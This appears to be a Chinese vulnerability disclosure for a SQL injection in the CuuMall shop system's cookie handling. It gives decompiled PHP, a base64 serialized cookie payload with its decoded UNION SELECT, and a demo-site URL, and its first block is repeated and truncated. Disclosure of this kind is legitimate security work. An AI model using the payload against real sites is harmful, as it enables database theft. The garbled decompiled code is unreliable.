VULHUB ™

### 简要描述： CuuMall免费网上商城系统基于企业级MVC技术架构，安全、稳定，可保证同时在线人数达10000人左右，能适应不同领域的公司企业，文件缓存机制、数据库缓存机制，保证系统稳定运行，多种功能以满足不同客户网上开店的需求。 ### 详细说明： 在detailaction.php页面中 ``` public function getgoodprv( ) { $coo = new Cookie( ); if ( $coo->is_set( "good_prv" ) ) { $prv = $coo->get( "good_prv" ); $unprv = ( ( $prv ) ); $pro = new Model( "produc" ); if ( 5 < ( $unprv ) ) { $i = ( $unprv ) - 5; for ( ; do { $i < ( $unprv ); ++$i, ) { $cooprv[$i] = $pro->where( "id=".$unprv[$i] )->find( ); break; } } while ( 1 ); } else { $i = 0; for ( ; $i < ( $unprv ); ++$i ) { $cooprv[$i] = $pro->where( "id=".$unprv[$i] )->find( ); } } } return $cooprv; } ``` 这一段代码解密的不是很完全，但可以看出是一个cookie获取以后 遍历值 直接带入数据库执行。 到demo站点测试cookie 以后，发现此处的cookie是一个两次序列化+base64的一个操作。 利用这个结构可以成功实现注入 POC：czoxNjE6ImE6MTp7aTowO3M6MTQyOiIwIFVOSU9OIFNFTEVDVCAxLDIsMyw0LGNvbmNhdCh1c2VyKCksJ3wnLGRhdGFiYXNlKCkpLDYsNyw4LDksMTAsMTEsMTIsMTMsMTQsMTUsMTYsMTcsMTgsMTksMjAsMjEsMjIsMjMsMjQsMjUsMjYsMjcsMjgsMjksMzAsMzEsMzIsMzMsMzQsMzUsMzYjIjt9Ijs= 解密后就是：...

### 简要描述： CuuMall免费网上商城系统基于企业级MVC技术架构，安全、稳定，可保证同时在线人数达10000人左右，能适应不同领域的公司企业，文件缓存机制、数据库缓存机制，保证系统稳定运行，多种功能以满足不同客户网上开店的需求。 ### 详细说明： 在detailaction.php页面中 ``` public function getgoodprv( ) { $coo = new Cookie( ); if ( $coo->is_set( "good_prv" ) ) { $prv = $coo->get( "good_prv" ); $unprv = ( ( $prv ) ); $pro = new Model( "produc" ); if ( 5 < ( $unprv ) ) { $i = ( $unprv ) - 5; for ( ; do { $i < ( $unprv ); ++$i, ) { $cooprv[$i] = $pro->where( "id=".$unprv[$i] )->find( ); break; } } while ( 1 ); } else { $i = 0; for ( ; $i < ( $unprv ); ++$i ) { $cooprv[$i] = $pro->where( "id=".$unprv[$i] )->find( ); } } } return $cooprv; } ``` 这一段代码解密的不是很完全，但可以看出是一个cookie获取以后 遍历值 直接带入数据库执行。 到demo站点测试cookie 以后，发现此处的cookie是一个两次序列化+base64的一个操作。 利用这个结构可以成功实现注入 POC：czoxNjE6ImE6MTp7aTowO3M6MTQyOiIwIFVOSU9OIFNFTEVDVCAxLDIsMyw0LGNvbmNhdCh1c2VyKCksJ3wnLGRhdGFiYXNlKCkpLDYsNyw4LDksMTAsMTEsMTIsMTMsMTQsMTUsMTYsMTcsMTgsMTksMjAsMjEsMjIsMjMsMjQsMjUsMjYsMjcsMjgsMjksMzAsMzEsMzIsMzMsMzQsMzUsMzYjIjt9Ijs= 解密后就是： s:161:"a:1:{i:0;s:142:"0 UNION SELECT 1,2,3,4,concat(user(),'|',database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36#";}"; 然后请求链接：http://demo.cuumall.com/index.php/detail/Index/id/3 [<img src="https://images.seebug.org/upload/201409/301107127924f629b1506a2a151b9d2230b6aec7.png" alt="BaiduHi_2014-9-30_11-3-18.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/301107127924f629b1506a2a151b9d2230b6aec7.png) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201409/301107127924f629b1506a2a151b9d2230b6aec7.png" alt="BaiduHi_2014-9-30_11-3-18.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/301107127924f629b1506a2a151b9d2230b6aec7.png)